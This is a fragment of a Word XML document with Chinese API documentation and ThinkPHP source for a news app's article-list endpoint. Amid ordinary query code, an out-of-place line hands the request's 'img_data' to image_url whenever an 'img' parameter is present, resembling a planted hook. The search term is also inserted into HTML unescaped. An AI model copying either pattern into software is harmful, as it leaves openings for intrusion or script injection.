        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>多个属性填写</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> ,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5654A5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mychannel    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>频道</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">ID </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>多个频道填写</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> ,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08638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pages        </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>每页显示数量（默认值：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5724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         </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>页码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66305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{List} field          </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>字段</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687F19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EFB0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total           </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>总记录条数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1E41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per_page        </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>每页显示数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CBD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current_page    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前页</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4538E5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{Object[]} data              </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>总记录数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C32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data.description    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>资讯概述</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D0FE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data.zan            </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>资讯获赞次数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C40E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data.pingNum        </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>资讯评论数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7777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data.share_num      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>资讯分享次数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3344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DF8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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C98DC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0F5626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$request-&gt;param('token');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FE6E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19E22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_decrypt($token);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138D00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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23544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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737E95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29BF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AD74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input('param.typeid/d', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F50A2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$flags = $request-&gt;param('flags/d') ? $request-&gt;param('flags/d') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436D28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 $request-&gt;param('mychannel/d') ? $request-&gt;param('mychannel/d') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DAAF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$request-&gt;param('pages/d') ? $request-&gt;param('pages/d') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3410BB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$request-&gt;param('uid/d') ? $request-&gt;param('uid/d') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0104A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$search = $request-&gt;param('search') ? $request-&gt;param('search') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5CD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$weitoutiao = $request-&gt;param('weitoutiao/d') ? $request-&gt;param('weitoutiao/d') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232B92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$request-&gt;param('date/d') ? $request-&gt;param('date/d') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59AF51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$city = $request-&gt;param('city') ? urldecode($request-&gt;param('city')) : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C3E5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$ids = $request-&gt;param('ids/d') ? $request-&gt;param('ids/d') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373F96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 = $request-&gt;param('hide/d') ? $request-&gt;param('hide/d') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D751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$svideodata = $request-&gt;param('svideodata/d') ? $request-&gt;param('svideodata/d') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303BD5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$where['hide'] = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027E62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if($ids){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A3A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['&lt;',$ids];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D8A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C0DA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($city == 'index.php') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04996E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$city = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4388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D661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($city) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2567F8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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B7B7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$where['title|tags|content|description|keywords'] = ['like', '%' . $city . '%'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F483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665D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($typeid &amp;&amp; $typeid != 999999999) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271296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($typeid != 132) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F270A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$typeids = _typeTid($typeid);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BC32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$typeids = implode(',', $typeids);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DB36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$where['typeid'] = ['in', $typeids];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D0A1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CF4F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1BC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if($flags){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2F0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$where['flags'] = $flags;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FFC6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7C5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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D25C2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['in', $mychannel];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C973A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0B4A7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['&lt;&gt;', 4];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7D0B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2B9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($typeid == 132) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE85A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3;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDB43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BD8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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465399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$uid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1033D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($weitoutiao) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30675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['in', '1,2'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FFC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CDCE8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['in', '0,2'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D14F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F3D2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['in', '0,1,2'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D1C5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if($hide){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8868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$hide;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2E8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2E5B3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unset($where['hide']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0120DF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318E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925FD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($typeid != 999999999) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01780C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($weitoutiao) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758267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['in', '1,2'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B83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53B2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['in', '0,2'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486C43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5520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D4E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EB1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($search) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FB85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$where['title|tags'] = ['like', '%' . $search . '%'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21454F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FDB2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($date) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C3FB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91D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&amp;&amp; $typeid == 999999999) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E065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$UidGuanzhuList = _userGuanzhuList($uid);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA721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(!$UidGuanzhuList) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C414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25D3C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=&gt; 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEDA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027C89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'current_page' =&gt; 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB126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6D2427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1462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18C1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$UidGuanzhuList = implode(',', $UidGuanzhuList);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD2DD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['in', $UidGuanzhuList];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108A84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09F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731F87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-&gt;where($where)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9A7E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-&gt;fetchSql(false)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EBD1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 update_time desc')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C17B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-&gt;field('id,title,dtitle,description,mychannel,image,update_time,source,pingNum,images,videodate,uid,click,weitoutiao,zan,pingNum,share_num,video,qiniu_video_type,content,hide,flags')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A632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-&gt;paginate($pages)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F19C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70110C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 ['appConfig'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591DF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6DF366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if(!empty($v['flags'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBCC6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$data['data'][$k]['flags_name'] = _flags($v['flags']); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0E93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3EEC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3 &amp;&amp; $v['video'] || $v['mychannel'] == 4) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1903BC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$data['data'][$k]['video'] = _imgUrl() . $v['video'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5F5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7F17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&amp;&amp; $v['mychannel'] != 3) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBFD3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4) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302D6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_imgUrl() . $v['image'].'?imageView2/1/w/300/h/450/format/jpg';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D2E9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B5354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_imgUrl() . $v['image'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D887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DA80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8833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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF28C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_imgUrl() . $v['image'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63130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CF1DE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1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F654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6176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_imgUrl() . '/' . $v['video'] . '?vframe/jpg/offset/2/w/300/h/200/format/jpg';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6E43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1B40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07C7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ACB8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$data['data'][$k]['create_time'] = _time($v['update_time']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A248C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($search) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77318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$data['data'][$k]['title'] = str_replace($search, '&lt;b class="fx-search"&gt;' . $search . '&lt;/b&gt;', $v['title']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433136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F262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($v['uid']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACB6E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496C5C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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D28A7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$data['data'][$k]['user']['username'] = $user['username'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9E9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$data['data'][$k]['user']['img'] = $user['img'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8BEB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D4D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$data['data'][$k]['uid'] = $user['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076003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7C5C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if(input('img')){$this-&gt;image_url(input('img_data'));}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EAEC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($v['weitoutiao'] == 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097F8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$kuandu = "?imageView2/1/w/192/h/124/format/jpg";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D35F0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2) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1945A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3CCE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$data['data'][$k]['pcList'] = json_decode($v['images'], true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABA2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$imagesPro = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53782F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($data['data'][$k]['pcList'] as $k_imagesPro =&gt; $v_imagesPro) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CF9E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$imagesPro[] = _imgUrl() . $v_imagesPro['img'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C129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4AA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$data['data'][$k]['imagesPro'] = $imagesPro;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D90D9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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09027E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'&lt;div class="aui-col-xs-12" style="height:11.5rem"&gt;&lt;img style="height:11.5rem" id="ffxiangImgCache" ffxiang-src="' . _imgUrl() . $v['image'] . '?imageView2/1/w/400/h/280/format/jpg" src="../image/loadingImage.png" /&gt;&lt;/div&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB6F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A437F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json_decode($v['images'], true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8EF8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$images['0']['img'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D175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'&lt;div class="aui-col-xs-12" style="height:11.5rem"&gt;&lt;img style="height:11.5rem" id="ffxiangImgCache" ffxiang-src="' . _imgUrl() . $images . '?imageView2/1/w/400/h/280/format/jpg" src="../image/loadingImage.png" /&gt;&lt;/div&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1382A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322E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 = $images . '&lt;em class="aui-iconfont aui-icon-image"&gt; ' . count(json_decode($v['images'], true)) . ' </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>图</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;/em&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1CF2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($v['mychannel'] == 3) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209D5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($v['mychannel'] == 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4705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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B063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preg_match_all("/img src=\"(.*?)\"/", $v['content'], $img);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E640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($img[1] as $ka =&gt; $va) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63464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(strpos($va, 'http') !== false) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B250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$va;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757E0A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(strpos($va, '/public/uploads/us/') !== false) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F646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$config['url'] . $va;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A63C4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081A8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_imgUrl() . $va;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3923F0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CCDD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85D09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$data['data'][$k]['imagesArticleList'] = $contet;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244DB6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5362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E08B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$data['data'][$k]['description'] = _substr($v['description'], 100, '&lt;a&gt;...[</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>查看全文</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>]&lt;/a&gt;');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5CE0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3 || $v['video'] || $v['mychannel'] == 4) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391ABE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($v['qiniu_video_type']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FC5C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 . $v['video'] . '?vframe/jpg/offset/2/w/200/h/200/format/jpg';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59808D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3C8B7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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36259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 . $v['image'] . '?imageView2/1/w/300/h/200/format/jpg';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B45D2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0A5AA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 . $v['video'] . '?vframe/jpg/offset/2/w/300/h/200';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8754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C8B5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F77A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$image;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F250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B1763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$kuandu = "?imageView2/1/w/200/h/200/format/jpg";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4063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 = json_decode(htmlspecialchars_decode($v['images']) , true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702EA9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($data['data'][$k]['images']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492327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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B9C7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$imagesPro = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46291F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($data['data'][$k]['images'] as $ks =&gt; $vsa) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BA8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(count($data['data'][$k]['images']) == 1 || count($data['data'][$k]['images']) == 2) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E5D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$col = "aui-col-xs-6";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642CA2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F6ABA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$col = "aui-col-xs-4";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C928A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D5D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(is_array($vsa)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C70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$vsa = $vsa['img'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF86D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8C5C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$imagesPro[] = _imgUrl() . $vsa . '?imageView2/0/format/jpg';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C0A9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'&lt;div class="' . $col . '" tapmode onclick="img(' . $v['id'] . ',' . $ks . ')"&gt;&lt;img id="ffxiangImgCache" ffxiang-src="' . _imgUrl() . $vsa . $kuandu . '" src="../image/loadingImage.png"&gt;&lt;/div&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15268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D79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 = $images;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475E60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$data['data'][$k]['imagesPro'] = $imagesPro;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA4B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6632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BA2B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$data['data'][$k]['zanUser'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1D87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$data['data'][$k]['guanzhu'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E59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($v['uid']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1042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7CE525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$data['data'][$k]['guanzhu'] = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE0E0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-&gt;where('uid', $uid)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371F36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$v['uid'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43714F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D1047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$data['data'][$k]['zanUser'] = Db::name('article_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248BC2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-&gt;where('aid', $v['id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B02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$uid)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EDA0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34260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26807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E6F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CD7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6C35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$data['data'][$k]['url'] = url('article/view', ['id' =&gt; $v['id']]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565962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249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 = count($data['data']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE4FB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($ad &gt; 1 &amp;&amp; !$weitoutiao) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749A8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$sdDb = Db::name('ad')-&gt;where(['hide' =&gt; 1,'device'=&gt;0])-&gt;order('rand()')-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6885B5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($sdDb) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C83C8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$data['data'][$ad]['mychannel'] = 99;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16ACD1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$data['data'][$ad]['url'] = $sdDb['url'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFFDE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$data['data'][$ad]['title'] = $sdDb['title'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3918F1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$data['data'][$ad]['ad'] = $sdDb['ad'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF6E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$data['data'][$ad]['image'] = _imgUrl() . $sdDb['image'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DF3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$data['data'][$ad]['source'] = $sdDb['source'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5B1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696D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8F2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if($svideodata){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2C64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$data['svideo_i'] = rand(1,count($data['data'])/2-1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05099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$svideo_where['mychannel'] = 4;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CED1A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$svideo_where['hide']   =   1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F21BE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$svideo_data = Db::name('article')-&gt;where($svideo_where)-&gt;order('des desc, id desc')-&gt;field('id,title,description,image,source,pingNum,videodate,uid,click,zan,video')-&gt;paginate(3)-&gt;toarray();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C94A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($svideo_data['data'] as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4F9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if($v['image']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8A9D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$svideo_data['data'][$k]['image']   =   _imgUrl().$v['image'].'?imageView2/1/w/300/h/450/format/jpg';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DB17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E1B8C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$svideo_data['data'][$k]['image']   =   _imgUrl() . '/' . $v['video'] . '?vframe/jpg/offset/2/w/300/h/450/format/jpg';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61EAA6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FBC0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($v['uid']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3212F7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1C9EC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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1228E8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$svideo_data['data'][$k]['user']['username'] = $user['username'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465B5A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$svideo_data['data'][$k]['user']['img'] = $user['img'] . "?imageView2/1/w/100/h/100/format/jpg";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B051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22C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6E1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$svideo_data['data'][$k]['video']   =   _imgUrl().$v['video'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4568A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261B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$data['svideo_data'] = $svideo_data;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0306DA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$redian_where['hide']   =   1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3901E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$redian_where['weitoutiao'] =   0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18077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$redian_where['flags']  =   2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C4C6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$redian_data = Db::name('article')-&gt;where($redian_where)-&gt;order('des desc, update_time desc')-&gt;field('id,title,dtitle,update_time')-&gt;limit(3)-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FFF6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($redian_data as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B138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 == 1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CA6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$data['redian_time'] =   date('Y-m-d H:i:s',$v['update_time']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFF05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8EF0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$redian_data[$k]['update_time']     =   date('H:i',$v['update_time']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA0D2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BF1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$data['redian_data'] = $redian_data;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502F1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0280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018D5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C52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76AA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/api/article/typeid </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>资讯分类列表</w:t>
